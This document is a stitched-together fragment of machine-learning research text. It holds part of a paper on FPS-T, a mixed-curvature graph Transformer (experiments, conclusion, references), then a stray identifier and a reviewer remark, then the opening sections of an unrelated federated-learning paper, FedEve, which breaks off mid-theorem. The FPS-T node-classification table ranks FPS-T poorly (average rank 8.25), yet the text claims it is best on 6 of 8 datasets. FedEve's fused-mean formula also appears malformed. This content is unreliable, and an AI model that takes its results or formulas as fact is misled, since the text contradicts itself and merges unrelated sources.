\phi(\tilde{Q}) \left( \phi'(\tilde{K})^T \tilde{V} \right) \right]_i $$ where $\phi'(K)_i = \phi(K)_i (\lambda_{V_i}^{\kappa} - 1)$ and $\tilde{V}_i = \frac{\lambda_{V_i}^{\kappa}}{\lambda_{V_i}^{\kappa} - 1} V_i$. This approximation enables FPS-T to encode graphs with $O(N + M)$ cost, matching the complexity of message-passing GCNs (Wu et al., 2020) while taking the non-Euclidean geometry into account. In Appendix C, we empirically verify this asymptotic cost and also find that the additional cost of Riemannian operations in FPS-T are mostly dominated by pre-existing Transformer operations when encoding large networks. In the upcoming experiments, we use the kernelized approach for FPS-T and find that the approximation performs well in practice. 5 EXPERIMENTS We first evaluate FPS-T on synthetic geometric graph reconstruction (e.g. tree or spherical graph) to verify whether our approach learns curvatures that best fit the input graph. We also benchmark existing graph reconstruction and node classification datasets to empirically demonstrate the benefit of capturing long-range interactions under mixed-curvature spaces in real-world settings. 5.1 GRAPH RECONSTRUCTION Datasets. For synthetic graph reconstruction, we generate four types of graphs where the suitable geometry is known a priori — TREES ($\mathbb{H}$), SPHERE ($\mathbb{S}$), TORUS ($\mathbb{S} \times \mathbb{S}$), and RING OF TREES ($\mathbb{S} \times \mathbb{H}$). An example illustration of the synthetic graphs can be found in Figure 3. We then evaluate FPS-T on four real-world networks: WEB-EDU (Gleich et al., 2004) is a web-page network under the .edu domain connected with hyperlinks; POWER (Watts & Strogatz, 1998) is a network that models the electrical power grid in western US; BIO-WORM (Cho et al., 2014) is a genetics network of the C. elegans worm; FACEBOOK (Leskovec & Mcauley, 2012) is a social network. Further details on the datasets such as sectional curvature statistics of the networks can be found in Appendix D. Training. The goal of graph reconstruction is to learn continuous node representations of the given graph that preserve the edge connectivity structure through distances in the feature space. Let $h_u$ denote the encoded representation of node $u \in V$ given a graph $G = (V, E)$. For synthetic graph reconstruction, we train FPS-T and TOKENGT by minimizing the graph distortion (Gu et al., 2019): $$ L(h, G) = \sum_{(u,v) \in V \times V, u \neq v} \left( \frac{d(h_u, h_v)}{d_G(u, v)} \right)^2 - 1 $$ where $d(h_u, h_v)$ denote the distance between $h_u$ and $h_v$ on the representation space, and $d_G(u, v)$ equals the shortest path distance between nodes $u$ and $v$ on graph $G$. Both methods use a single layer with 1 or 2 attention heads with a combined latent dimension of 10. | Dataset | WEB-EDU | POWER | FACEBOOK | BIO-WORM | |---------|---------|-------|----------|----------| | Avg. Curvature | -0.63 | -0.28 | -0.08 | -0.03 | | MLP | 83.24±1.32 | 83.89±4.02 | 50.64±15.12 | 73.34±20.85 | | GCN | 79.95±0.23 | 98.25±0.02 | 78.99±0.29 | 93.32±1.06 | | GAT | 88.86±0.36 | 99.03±0.01 | 82.81±0.25 | 97.76±0.03 | | SAGE | 86.34±0.31 | 97.58±0.14 | 81.01±0.26 | 96.86±0.06 | | SGC | 78.78±0.12 | 97.69±0.05 | 74.69±0.36 | 89.73±0.59 | | TOKENGT | 89.45±0.06 | 99.10±0.00 | 84.71±0.02 | 97.82±0.02 | | HGCN | 80.13±0.31 | 96.82±0.08 | 74.35±5.39 | 86.96±0.30 | | HGNN | 83.64±0.26 | 97.85±0.05 | 78.74±0.58 | 90.97±1.06 | | HAT | 90.21±0.36 | 93.86±0.34 | 80.09±0.20 | 93.58±0.42 | | \( \kappa \)-GCN | 55.34±35.88 | 98.23±0.09 | 20.80±20.69 | 84.16±13.67 | | \( Q \)-GCN | 80.34±0.07 | 97.87±0.01 | 76.33±0.01 | 96.15±0.01 | | FPS-T | 99.10±0.01 | 99.32±0.01 | 86.16±0.10 | 98.19±0.03 | Figure 4: **Left:** Real-world graph reconstruction results. We run each method under 5 random seeds and report the average mAP with 95% confidence intervals. **Right:** Test mAP (Y-axis) of FPS-T and TOKENGT on WEB-EDU with decreasing model size (X-axis; by decreasing the latent dimension). Using mixed-curvature spaces can be more parameter efficient in preserving graph structures. For real-world graph reconstruction, we instead minimize a loss function that aims for preserving the local connections as computing the all-pairwise shortest path distances becomes computationally intractable with large networks: \[ L(h, G) = \sum_{(u,v) \in E} \log \frac{e^{-d(h_u,h_v)}}{\sum_{v' \in E(u)} e^{-d(h_u,h_{v'})}} \] Here, \( E(u) \) denotes the set of non-neighbors of node \( u \). In addition to TOKENGT, we also compare FPS-T against baselines including Euclidean (GCN (Kipf & Welling, 2016), GAT (Veličković et al., 2017), SAGE (Hamilton et al., 2017), SGC (Wu et al., 2019)), hyperbolic (HGCN (Chami et al., 2019), HGNN (Liu et al., 2019), HAT (Zhang et al., 2021)), and mixed-curvature (\( \kappa \)-GCN (Bachmann et al., 2020), \( Q \)-GCN (Xiong et al., 2022)) message passing-based GCNs. For fair comparison, we set the number of layers to one and latent dimension to 16 for all models. We train all models for 10k epochs using an Adam optimizer with learning rate \( 1e^{-2} \). The node features are given as one-hot encodings with additional random noise following Xiong et al. (2022). We defer details on the choice of hyperparameters of baseline methods to Appendix E. **Results.** Table 1 reports the synthetic graph reconstruction results in average graph distortion as well as curvatures learned by FPS-T. As expected, FPS-T consistently outperforms its Euclidean counterpart on all four networks due to the networks exhibiting highly non-Euclidean structures. Despite being initialized at zero, the learnable curvatures in FPS-T converge towards curvatures that intuitively match with the input graph: for RING OF TREES, FPS-T with two attention heads converge towards one positive and one negative curvature, outperforming the single-head variant. Next, the left table in Figure 4 shows the average sectional curvature of each real-world network and corresponding graph reconstruction results in mean average-precision (mAP) which measures the average ratio of nearest points that are actual neighbors of each node. We find that FPS-T shows significant performance gains on all four networks when compared to all baselines including Euclidean TOKENGT. Specifically, FPS-T shows a 10.5% gain in mAP against TOKENGT on WEB-EDU with an average sectional curvature of -0.63, showing that performing attention on the non-Euclidean product-stereographic space is especially effective when encoding graphs containing many non-zero sectional curvatures. Note that non-Euclidean spaces are theoretically known to well-embed complex structures in low dimensions, while Euclidean spaces require a large number of dimensions to attain reasonable precision (Sala et al., 2018). Based on this observation, we test whether FPS-T enjoys better parameter efficiency compared to TOKENGT by training two models with decreasing latent dimensions in \{16, 12, 8, 4\}. In the right plot of Figure 4, we report the mAP score of TOKENGT and FPS-T on the WEB-EDU network after training with decreasing number of parameters. We observe that our approach of incorporating mixed-curvature spaces consistently obtains low distortion embeddings in a more parameter-efficient manner, outperforming TOKENGT with \( d = 16 \) using half its model size. Table 2: Node classification results. We run each method under 10 different random seeds and report the average F1 scores with 95% confidence intervals and average rankings across all datasets. | Dataset | TEXAS | CORNELL | WISCONSIN | ACTOR | AIRPORT | CITESEER | PUBMED | CORA | Avg. Rank | |---------|-------|---------|-----------|-------|---------|----------|--------|------|-----------| | H(G) | 0.11 | 0.13 | 0.20 | 0.22 | 0.72 | 0.74 | 0.80 | 0.81 | | | MLP | 70.54±3.00 | 58.38±4.04 | 81.20±1.87 | 33.62±0.55 | 54.05±1.78 | 52.58±1.97 | 67.17±0.91 | 52.44±1.08 | 8.25 | | GCN | 57.84±1.62 | 47.84±1.77 | 45.40±2.62 | 27.09±0.36 | 92.00±0.63 | 71.38±0.43 | 78.37±0.26 | 80.40±0.53 | 7.38 | | GAT | 59.46±1.12 | 55.14±1.80 | 46.20±2.30 | 27.43±0.23 | 92.35±0.36 | 71.70±0.29 | 78.14±0.31 | 82.29±0.46 | 6.13 | | SAGE | 68.38±3.54 | 70.54±2.01 | 78.40±0.52 | 36.87±0.50 | 93.21±0.57 | 70.58±0.42 | 77.31±0.59 | 78.88±0.87 | 5.13 | | SGC | 57.57±2.96 | 52.97±2.87 | 46.40±2.01 | 27.14±0.46 | 90.48±1.01 | 72.11±0.38 | 75.11±1.27 | 79.68±0.65 | 8.25 | | TOKENGT | 88.65±2.06 | 71.62±2.13 | 83.00±0.65 | 36.59±0.89 | 95.90±0.39 | 71.23±0.51 | 78.93±0.27 | 81.42±0.79 | 2.50 | | HGNN | 54.59±3.93 | 55.68±1.80 | 55.60±2.53 | 28.89±0.16 | 92.47±0.63 | 69.92±0.60 | 75.67±0.99 | 80.00±0.85 | 7.00 | | HAT | 50.81±3.60 | 52.70±1.42 | 54.60±2.68 | 29.09±0.19 | 90.55±0.71 | 69.82±0.53 | 76.72±0.86 | 79.30±0.51 | 8.75 | | κ-GCN | 82.16±2.52 | 70.54±1.67 | 81.80±1.36 | 38.34±0.26 | 92.88±0.57 | 68.14±0.53 | 77.50±0.42 | 79.81±0.58 | 4.38 | | Q-GCN | 56.22±4.38 | 55.68±5.59 | 46.60±2.41 | 26.39±0.60 | 82.58±3.70 | 54.06±4.45 | 68.61±3.05 | 73.70±0.69 | 10.3 | | FPS-T | 51.35±3.44 | 55.95±2.85 | 52.80±2.20 | 28.18±0.55 | 91.39±1.05 | 66.15±0.45 | 77.13±0.59 | 79.63±0.57 | 8.25 | 5.2 NODE CLASSIFICATION Datasets. For node classification we experiment on eight different networks: three WebKB networks (TEXAS, CORNELL, WISCONSIN) that connect web-pages via hyperlinks (Craven et al., 1998), a co-occurrence network from Wikipedia pages related to English films (ACTOR) (Tang et al., 2009), three citation networks (CITESEER, PUBMED, CORA) (Sen et al., 2008), and an airline network (AIRPORT) (Chami et al., 2019). These networks are chosen to test our approach under a wide spectrum of graph homophily $H(G)$, which measures the ratio of edges that connect nodes that share the same label (Zhu et al., 2020a). In other words, a heterophilic graph with small graph homophily requires capturing long-range interactions for proper labeling, which is naturally difficult for message passing-based approaches with small receptive fields. More detailed statistics on the networks can be found in Appendix D. Training. For all methods, we fix the embedding dimension to 16 and train each model to minimize the cross-entropy loss using an Adam optimizer with a learning rate of $1e^{-2}$. For models that use learnable curvatures (i.e., HGCN, κ-GCN and FPS-T), we use a learning rate of $1e^{-4}$ for the curvatures. The optimal number of layers, activation function, dropout rate, and weight decay of each method are chosen via grid search on each dataset. Details on the hyperparameter search-space and dataset splits can be found in Appendix E.2. Results. Table 2 shows the results from node classification. Overall, our method attains best accuracy on 6 out of 8 datasets, showing that FPS-T is effective across networks with various graph homophily. In case of heterophilic networks, we find that the small receptive fields of message-passing GCNs are extremely inadequate, often being outperformed by a simple MLP that completely ignores the graph connectivity. On the other hand, FPS-T consistently outperforms MLP as well as GCN baselines, due to its ability to exchange information across long distances via global-attention. It also significantly outperforms TOKENGT by 8.3% on Actor, showing that adjusting the geometry towards non-Euclidean can further enhance predictive performance. In homophilic networks where message-passing is more well-suited, FPS-T shows competitive performance against GCN baselines. This is expected as FPS-T enjoys the same capacity as TOKENGT to mimic any order-2 equivariant bases (Kim et al., 2022), which includes local message-passing, through attention score computation. 6 CONCLUSION We propose FPS-T, a natural generalization of the Transformer architecture towards mixed-curvature spaces with learnable curvatures. When combined with the graph tokenization technique of Kim et al. (2022), our model can embed graphs with less distortion and higher parameter-efficiency than its Euclidean counterpart by operating on the product-stereographic model. We also show that our model outperforms existing hyperbolic and mixed-curvature message-passing GCN baselines on node classification via global-attention that can capture long-range interactions. By linearizing the cost of self-attention through kernelized approximation, FPS-T runs in cost linear to the number of nodes and edges, allowing practical use on large-scale networks. For future work, we plan to extend towards heterogeneous manifolds (Giovanni et al., 2022) with input-dependent sectional curvatures and also optimize Riemannian operations towards better stability and efficiency under finite precision. As we propose a foundational generalization of the Transformer architecture, investigating what geometry suits best for various tasks in the NLP and CV domain would also be an interesting direction. REFERENCES Uri Alon and Eran Yahav. On the bottleneck of graph neural networks and its practical implications. *arXiv preprint arXiv:2006.05205*, 2020. Gregor Bachmann, Gary Bécigneul, and Octavian Ganea. Constant curvature graph convolutional networks. In *International Conference on Machine Learning*, pp. 486–496. PMLR, 2020. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020. Chen Cai and Yusu Wang. A note on over-smoothing for graph neural networks. *arXiv preprint arXiv:2006.13318*, 2020. Ines Chami, Zhiqiao Ying, Christopher Ré, and Jure Leskovec. Hyperbolic graph convolutional neural networks. *Advances in neural information processing systems*, 32, 2019. Ara Cho, Junha Shin, Sohyun Hwang, Chanyoung Kim, Hongseok Shim, Hyojin Kim, Hanhae Kim, and Insuk Lee. WormNet v3: a network-assisted hypothesis-generating server for Caenorhabditis elegans. *Nucleic Acids Research*, 42(W1):W76–W82, 05 2014. ISSN 0305-1048. doi: 10.1093/nar/gku367. URL https://doi.org/10.1093/nar/gku367. Sungjun Cho, Seonwoo Min, Jinwoo Kim, Moontae Lee, Honglak Lee, and Seunghoon Hong. Transformers meet stochastic block models: Attention with data-adaptive sparsity and cost. *arXiv preprint arXiv:2210.15541*, 2022. Krzysztof Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Davis, Afroz Mohiuddin, Lukasz Kaiser, et al. Rethinking attention with performers. *arXiv preprint arXiv:2009.14794*, 2020. Mark Craven, Andrew McCallum, Dan PiPasquo, Tom Mitchell, and Dayne Freitag. Learning to extract symbolic knowledge from the world wide web. Technical report, Carnegie-mellon univ pittsburgh pa school of computer Science, 1998. Calin Cruceru, Gary Bécigneul, and Octavian-Eugen Ganea. Computationally tractable riemannian manifolds for graph embeddings. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 35, pp. 7133–7141, 2021. Michaël Defferrard, Martino Milanî, Frédérick Gusset, and Nathanaël Perraudin. Deepsphere: a graph-based spherical cnn. In *International Conference on Learning Representations*, 2020. URL https://openreview.net/forum?id=Ble3OlStPB. Cheng Deng, Fan Xu, Jiaxing Ding, Luoyi Fu, Weinan Zhang, and Xinbing Wang. Fmgnn: Fused manifold graph neural network. *arXiv preprint arXiv:2304.01081*, 2023. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. *arXiv preprint arXiv:2010.11929*, 2020. Vijay Prakash Dwivedi and Xavier Bresson. A generalization of transformer networks to graphs. *arXiv preprint arXiv:2012.09699*, 2020. Vijay Prakash Dwivedi, Ladislav Rampášek, Michael Galkin, Ali Parviz, Guy Wolf, Anh Tuan Luu, and Dominique Beaini. Long range graph benchmark. *Advances in Neural Information Processing Systems*, 35:22326–22340, 2022. Jiarui Feng, Yixin Chen, Fuhai Li, Anindya Sarkar, and Muhan Zhang. How powerful are k-hop message passing graph neural networks. *arXiv preprint arXiv:2205.13328*, 2022.
HSESApr9r7
The so called ``period drift'' comes from the stochastic sampling of clients. If we see sampling clients as sampling data in SGD, such a period drift also happens during SGD -- each batch of data has distinct data distribution from other batches. Authors should provide a more rigorous definition of period drift and show that how the period drift harms training.
FedEve: On Bridging the Client Drift and Period Drift for Cross-device Federated Learning Anonymous authors Paper under double-blind review Abstract Federated learning (FL) is a machine learning paradigm that allows multiple clients to collaboratively train a shared model without exposing their private data. Data heterogeneity is a fundamental challenge in FL, which can result in poor convergence and performance degradation. Client drift has been recognized as one of the factors contributing to this issue resulting from the multiple local updates in FEDAVG. However, in cross-device FL, a different form of drift arises due to the partial client participation, but it has not been studied well. This drift, referred as period drift, occurs as participating clients at each communication round may exhibit distinct data distribution that deviates from that of all clients. It could be more harmful than client drift since the optimization objective shifts with every round. In this paper, we investigate the interaction between period drift and client drift, finding that period drift can have a particularly detrimental effect on cross-device FL as the degree of data heterogeneity increases. To tackle these issues, we propose a predict-observe framework and present an instantiated method, FedEve, where these two types of drift can compensate each other to mitigate their overall impact. We provide theoretical evidence that our approach can reduce the variance of model updates. Extensive experiments demonstrate that our method outperforms alternatives on non-iid data in cross-device settings. 1 Introduction Federated learning is a decentralized machine learning approach that enables multiple clients to collaboratively train a shared model without exposing their private data [McMahan et al., 2017]. In this paradigm, each client independently trains a local model using its own data and subsequently sends the model updates to a central server. The server then periodically aggregates these updates to improve the global model until it reaches convergence. There are two primary settings in FL: cross-silo and cross-device [Kairouz et al., 2021]. Cross-silo FL typically involves large organizations (small number of clients), where most clients actively participate in every round of training [Chen and Chao, 2021; Lin et al., 2020]. In contrast, cross-device FL focuses on scenarios like smartphones (huge number of clients, e.g., millions), where only a limited number of clients participate in each round [Li et al., 2020b; Reddi et al., 2020], due to communication bandwidth, client availability, and other issues. This paper primarily focuses on the cross-device setting with partial client participation since we discover and then solve its unique challenge — “period drift”. Distinguished from traditional distributed optimization, the statistical heterogeneity of data has been acknowledged as a fundamental challenge in FL [Li et al., 2020a; Chen and Chao, 2021; Lin et al., 2020]. This data heterogeneity refers to the violation of the independent and identically distributed (non-iid) data assumption across clients, which can result in poor convergence and performance degradation when using FEDAVG. Client drift is recognized as one of the factors contributing to this issue and attracts numerous efforts to address it [Karimireddy et al., 2021; Li et al., 2020b; Reddi et al., 2020]. This phenomenon is characterized by clients who, after multiple local updates, progress too far towards minimizing their local objective, consequently diverging from the shared direction. However, in cross-device FL, a different form of drift exists and could be more detrimental to the training process than client drift, which has not been extensively studied. This drift occurs periodically as different clients participate in each communication round, and these participating clients as a group may exhibit distinct data distribution that deviates from the overall distribution of all clients. This deviation could potentially lead to slow and unstable convergence, as the optimization objective shifts with every round. For simplicity, we refer to this phenomenon as period drift. Despite both period drift and client drift being rooted in data heterogeneity, they stem from different causes (as illustrated in Figure 1). Client drift results from multiple local updates and the non-iid, while period drift arises due to partial client participation and the non-iid. The combined effect of period drift and client drift further complicates the process of reaching stable and efficient convergence and makes it more challenging in cross-device FL. In this paper, we first investigate the impact of period drift and client drift, finding that period drift can have a particularly detrimental effect on cross-device FL as the degree of data heterogeneity increases (as demonstrated in detail in Section 4.2). While the impacts of period drift and client drift are additive, we fortunately uncover a cooperative mechanism whereby these two types of drift can compensate each other to mitigate their overall impact. To achieve this, we propose a predict-observe framework, where we consider at each round 1) the server optimization (e.g., momentum) as a prediction of a update step of FL; 2) the clients’ optimization (e.g., local SGD) as an observation of this update step. Note that the vanilla FEDAVG is a special case in which the server does not make any predictions and solely relies on the observation provided by clients. In this framework, period drift and client drift are viewed as the noise respectively associated with prediction and observation. We thereby incorporate a Bayesian filter to integrate prediction (with period drift) and observation (with client drift) to achieve a better estimation of update step and reduce uncertainties. Based on the predict-observe framework, we present an instantiated method, referred as FEDEVE, which combines the prediction and observation through linear interpolation. The coefficient of this linear combination indicate the relative confidence between prediction and observation, which is determined by the variance of the period drift and client drift, thus produces a more precise estimation of updates. FEDEVE does not increase the client storage or extra communication costs, and does not introduce additional hyperparameter tunning, making it ideal for cross-device FL. Contributions We summarize the primary contributions of this paper as follows: • We analyze the impact of period drift and client drift for cross-device FL, and observe that period drift has a particularly detrimental effect as the degree of data heterogeneity increases. • We propose a predict-observe framework for cross-device FL that incorporates a Bayesian filter to integrate server optimization and clients’ optimization so that period drift and client drift can compensate for each other. • As an instantiation of the proposed framework, we present FEDEVE to combine prediction and observation through linear interpolation based on the variance of the period drift and client drift. • We provide theoretical evidence within our framework that FEDEVE can reduce the variance of model updates. Extensive experiments demonstrate that our method outperforms alternatives on non-iid data in cross-device settings. 2 RELATED WORKS There are many works that have attempted to address the non-iid problem in federated learning. FEDAVG, first presented by McMahan et al. (2017), has been demonstrated to have issues with convergence when working with non-iid data. Zhao et al. (2018) depict the non-iid trap as weight divergence, and it can be reduced by sharing a small set of data. However, in traditional federal setting, data sharing violates the principle of data privacy. Karimireddy et al. (2021) highlight the phenomenon of “client drift” that occurs when data is heterogeneous (non-iid), and uses control variates to address this problem. However, using Scaffold in cross-device FL may not be effective, as it requires clients to maintain the control variates, which may become outdated and negatively impact performance. Li et al. (2020b) propose FedProx that utilizes a proximal term to deal with heterogeneity. 1For a smoother reading experience, please feel free to check out our reading guide in Appendix A. In addition to these works, some research has noticed the presence of period drift, but have not specifically addressed it in their analysis. For example, Cho et al. (2022); Fraboni et al. (2023) investigate the problem of biased client sampling and propose a sampling strategy that selects clients with large loss. However, active client sampling can potentially alter the overall data distribution by having unrandom clients participation, which can raise concerns about fairness. Similarly, Yao et al. (2019) propose a meta-learning based method for unbiased aggregation, but it requires training the global model on a proxy dataset, which may not be feasible in certain scenarios where such a dataset is not available. Zhu et al. (2022) observe that the data on clients have periodically shifting distributions that changed with the time of day, and model it using a mixture of distributions that gradually shifted between daytime and nighttime modes. Guo et al. (2021) study the impact of time-evolving heterogeneous data in real-world scenarios, and solve it in a framework of continual learning. Although these two papers define similar terms, they focus on the case of client data changing over time. However, in this paper, we find that even if the distribution of client data remains unchanged, period drift can seriously affect the convergence of FL. 3 METHODOLOGY In this section, we discuss the problem of some methods (e.g., FEDAVG) in cross-device FL, and then propose our predict-observe framework and a method FEDEVE to deal with it. 3.1 TYPICAL FEDERATED LEARNING SETUP Federated learning, as described by McMahan et al. (2017), involves utilizing multiple clients and a central server to optimize the overall learning objective. The goal is to minimize the following objective function: $$\min_w f(w) = \sum_{k=1}^{N} p_k F_k(w) = E_k[F_k(w)],$$ (1) where $N$ is the number of clients, $p_k \geq 0$, and $\sum_k p_k = 1$. In general, the global objective is the expectation of the local objective over different data distributions $D_k$, i.e., $F_k(w) = E_{x_k \sim D_k}[f_k(w; x_k)]$, with $n_k$ samples on each client $k$ and weighted by $p_k$. We set $p_k = \frac{n_k}{n}$, where $n = \sum_k n_k$ is the total number of data points. In deep learning setting, $F_k(w)$ is often non-convex. A common approach to solve the objective (1) in federated settings is FEDAVG (McMahan et al., 2017). For example, in cross-device FL, a small subset $S_t$ ($|S_t| \ll N$) of the total clients are selected at each round (ideally randomly, but possibly biased in practice), and then the server broadcasts its global model to the selected client. In parallel, each of the selected clients runs SGD on their own loss function $F_k(\cdot)$ for $E$ number of epochs, and sends the resulting model to the server. The server then updates its global model as the average of these local models and repeats this process until convergence. One problem of FL is the non-iid data across clients, which can bring about “client drift” in the updates of each client, resulting in slow and unstable convergence (Karimireddy et al., 2021). Despite efforts to address the problem of client drift (Karimireddy et al., 2021; Li et al., 2020b; Reddi et al., 2020), there is a lack of research on the issue of period drift, i.e. the data distribution of selected clients at each round may differ from the overall data distribution of all clients. Period drift along with client drift can greatly impact the convergence of the learning process in FL, thus we propose a predict-observe framework to deal with them. 3.2 THE IMPACT OF DRIFT In contrast to conventional distributed optimization, federated learning possesses distinct characteristics, such as client sampling, multiple local epochs, and non-iid data distribution. These attributes may lead to a drift in the updates of global model, resulting in suboptimal performance. This drift can be thought of as a noise term that is added to the true optimization states during the optimization process. Thus, we can make the assumption as: **Assumption 3.1.** The aggregated model parameters on the server $w_{server}$, can be represented as the sum of the optimal parameters $w^*$ and a drift (noise) that follows a normal distribution $w_{drift} \sim \mathcal{N}(0, \sigma^2_{drift})$: $$w_{server} = w^* + w_{drift} \leftarrow \text{noise},$$ (2) where $w^*$ represents the optimal parameters obtained through the use of stochastic gradient descent (SGD), $w_{drift}$ represents the noise term caused by factors such as client sampling, multiple local epochs, and non-iid data distribution that we assume a normal distribution, and \( w_{\text{server}} \) represents the aggregated model parameters also follows a normal distribution \( w_{\text{server}} \sim \mathcal{N}(w^*, \sigma_{\text{drift}}^2) \), with the expectation of the aggregate model parameters being equal to the optimal parameters, i.e. \( \mathbb{E}[w_{\text{server}}] = w^* \). Note that the assumption of Gaussian-like noise is natural, and its justification can be found in Appendix A.2. In order to investigate the effect of the deviation on performance in FL, we utilize a regression optimization objective as in previous studies, such as (Zhang et al., 2019) and (Wu et al., 2018): \[ \hat{\mathcal{L}}(w) = \frac{1}{2} (w + w_{\text{drift}})^T A (w + w_{\text{drift}}), \] where \( w_{\text{drift}} \sim \mathcal{N}(0, \sigma^2) \) is the drift caused by the characteristics of FL. Therefore, the generalization error can be formulated as: \[ \mathcal{L}(w_t) = \mathbb{E} \left[ \hat{\mathcal{L}}(w_t) \right] = \frac{1}{2} \mathbb{E} \left[ \sum_i a_i \left( w_i^t + \sigma_i^2 \right) \right] = \frac{1}{2} \sum_i a_i \left( \mathbb{E} \left[ w_i^t \right]^2 + \mathbb{V} \left[ w_i^t \right] + \sigma_i^2 \right). \] In the context of FL, the generalization error can also be decomposed into three components: bias, variance, and noise. The noise component in this context is further influenced by factors such as client sampling, multiple local epochs, and non-iid data distribution, leading to a much larger overall generalization error compared to traditional stochastic gradient descent. Thus, our goal is to reduce the variance of drift \( \sigma^2 \) in order to improve both the convergence and performance of the model. By reducing the variance of drift, we can ensure that the updates made to the model are more consistent and accurate, leading to better overall performance. The subsequent section of this study aims to investigate the influence of drift on both the server and client side with respect to this noise component in federated learning. ### 3.3 THE PREDICT-OBSERVE FRAMEWORK Initially, we establish the concept of period drift, represented by \( Q_t \), and client drift, represented by \( R_t \) at the \( t \)-th communication round. We first make an assumption of independence concerning the two types of drift, which states that the two drifts are independent of one another. This assumption allows us to more accurately analyze the impact of each drift on the model’s performance and devise methods to mitigate their effects. **Assumption 3.2.** The initialization model parameters are independent of all period drifts \( Q_t \) and client drifts \( R_t \) at each communication round, that is \( w_0 \perp Q_0, Q_1, \cdots, Q_t \) and \( w_0 \perp R_0, R_1, \cdots, R_t \). The justification and limitation of this assumption can be found in Appendix A.3. Since the clients participating in each round in cross-device FL is only a small fraction of all clients, period drift can be attributed to the discrepancy that the objective of selected clients at each round does not align with the overall objective. Thus, an effective prediction of updates can potentially help reduce the period drift. As formulated in Equation (2), we express the prediction of updates on the server as: \[ \hat{w}_{t+1} = g(w_t) + Q_t, \quad Q_t \sim \mathcal{N}(0, \sigma_{Q_t}^2), \] where \( \hat{w}_{t+1} \) is the prediction model of \((t + 1)\)-th round as the output of predict function \( g(\cdot) \) with the current model \( w_t \) as input. It is noteworthy that the period drift at the \( t \)-th round is represented by \( Q_t \), and just like the drift in assumption 3.1, it is assumed to follow a normal distribution \( \mathcal{N}(0, \sigma_{Q_t}^2) \), characterized by a mean of zero and a variance of \( \sigma_{Q_t}^2 \). Client drift can be attributed to the phenomenon that the averaged optima of objectives does not align with the optima of averaged objectives. Thus, we consider the updates provided by these clients is a kind of observation of global updates. As formulated in Equation (2), we express it as: \[ \tilde{w}_{t+1} = h(\hat{w}_{t+1}) + R_t, \quad R_t \sim \mathcal{N}(0, \sigma_{R_t}^2), \] where \( \tilde{w}_{t+1} \) is the model of \((t + 1)\)-th round as the output of observe function \( h(\cdot) \) with the predict model \( w_t \) as input. Also, the client drift at the \( t \)-th round is represented by \( R_t \), and just like the drift in assumption 3.1, it is assumed to follow a normal distribution \( \mathcal{N}(0, \sigma_{R_t}^2) \), characterized by a mean of zero and a variance of \( \sigma_{R_t}^2 \). It is clear that standard FedAvg is a special case since there is no prediction for server optimization, and it solely relies on the observations provided by clients. Furthermore, the period drift, \( Q_t \), and the client drift, \( R_t \), are represented as noise terms that are incorporated into the prediction and observation functions. According to assumption 3.2, these drifts are independent of the current model states, and the lemma of independence noise is posited: Lemma 3.3. (Independence of Noise). The noise present in the prediction and observation at each communication round is independent of the current model state, specifically, \( w_t \perp Q_t \) and \( w_t \perp R_t \). The complete proof of the independence of noise can be found in appendix A.4. The equations presented in equations (3) and (4) depict the prediction and observation of updates, respectively, taking into account both period drift and client drift. In order to reconcile the discrepancy between the prediction (including period drift) and observation (including client drift), a Bayesian filter is introduced to allow for compensation between the two sources of drift. The prior probability of \( w_{t+1} \) is represented by \( P(\hat{w}_{t+1}) \), and by combining the observation \( P(w_{t+1} | \hat{w}_{t+1}) \) and the likelihood \( P(\hat{w}_{t+1} | \tilde{w}_{t+1}) \), the posterior probability \( P(w_{t+1} | \tilde{w}_{t+1}) \) of \( w_{t+1} \) can be calculated as the new model at the \((t + 1)\)-th round, as shown in Equation (5). \[ P(w_{t+1}) := P(\hat{w}_{t+1} | \tilde{w}_{t+1}) = \frac{P(\hat{w}_{t+1} | \tilde{w}_{t+1})P(\hat{w}_{t+1})}{P(\tilde{w}_{t+1})}. \] (5) By utilizing the Bayesian filter in our predict-observe framework, an update mechanism is implemented that first performs prediction and then observes the predicted model state, as described in the following procedure: \[ f^+_{w_t}(w) \overset{\text{predict}}{\Rightarrow} f^-_{\hat{w}_{t+1}}(w) = \int_{-\infty}^{+\infty} f_{Q_t}[w - f(v)]f^+_{w_t}(v)dv \] \[ \overset{\text{observe}}{\Rightarrow} f^+_{w_{t+1}}(w) = \eta_t \cdot f_{R_t}[w_{t+1} - h(w)] \cdot f^-_{\hat{w}_{t+1}}(w), \] where \( f^+_{w_t}(w) \) is the posterior probability of \( w_t \), \( f^-_{\hat{w}_{t+1}}(w) \) is the prior probability of \( w_{t+1} \), \( f_{Q_t} \) is the PDF of period drift, \( f^+_{w_{t+1}}(w) \) is the posterior probability of \( w_{t+1} \), \( f_{R_t} \) is the PDF of client drift, and \[ \eta_t = \left\{ \int_{-\infty}^{+\infty} f_{R_t}[\hat{w}_{t+1} - h(\hat{w}_{t+1})]f^-_{\hat{w}_{t+1}}(w)dw \right\}^{-1}. \] By combining prediction and observation, the fused model can be estimated by taking the expectation of the posterior probability as follow: \[ \hat{w}_{t+1} = E\left[ f^+_{w_{t+1}}(w) \right] = \int_{-\infty}^{+\infty} wf^+_{w_{t+1}}(w)dw. \] (7) Theorem 3.4. Given assumption 3.1 and lemma 3.3, the composite model will exhibit a diminished degree of variance in comparison to the individual variances of both period drift and client drift, and the mean will be a linear combination that is weighted by the variances: \[ \mu_{\text{fused}} = \frac{\mu_1 \sigma^2_{R_t} + \mu_2 \hat{\sigma}^2_{t+1}}{\sigma^2_{R_t}}, \] \[ \sigma^2_{\text{fused}} = \frac{\hat{\sigma}^2_{t+1} \sigma^2_{R_t}}{\sigma^2_{t+1} + \sigma^2_{R_t}}, \] (8) where \( \mu_1, \mu_2, \mu_{\text{fused}} \) is the mean of prediction, observation and fused model, and \( 